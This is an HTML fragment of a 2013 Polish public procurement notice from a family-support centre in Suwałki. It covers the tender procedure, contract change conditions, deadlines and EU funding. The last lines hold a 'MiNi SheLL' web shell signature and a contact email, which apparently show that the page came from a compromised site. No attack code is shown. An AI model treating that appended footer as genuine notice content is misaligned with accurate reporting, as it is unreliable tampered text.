<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Stosownie do art. 144 ustawy Prawo zamówień publicznych Zamawiający zastrzega sobie możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, 
na podstawie, której wybrano wykonawcę polegającej na:
- zmianie terminu realizacji zamówienia z przyczyn niezależnych od Zamawiającego jak również Wykonawcy, 
- z powodu zmiany liczby osób na mniejszą, bądź większą, która będzie uczestniczyła 
w danym zleceniu, 
- wystąpienia zdarzeń losowych, 
- zmiany osób przewidzianych do realizacji zamówienia w uzasadnionych sytuacjach, 
- poprawie oczywistych omyłek pisarskich i rachunkowych w treści umowy;
- zmiany adresu i stron reprezentujących strony umowy; 
- zmian w prawie krajowym lub wytycznych realizacji projektów współfinansowanych 
ze środków EFS.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> pcpr.powiat.suwalski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Suwałkach
ul. Świerkowa 60
16 - 400 Suwałki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.05.2013 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Suwałkach
ul. Świerkowa 60
16 - 400 Suwałki
Pokój nr 19.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt PO KL KORKOCIĄG. Wypłyń na głębię!- współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, realizowany przez Powiatowe Centrum Pomocy Rodzinie w Suwałkach..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com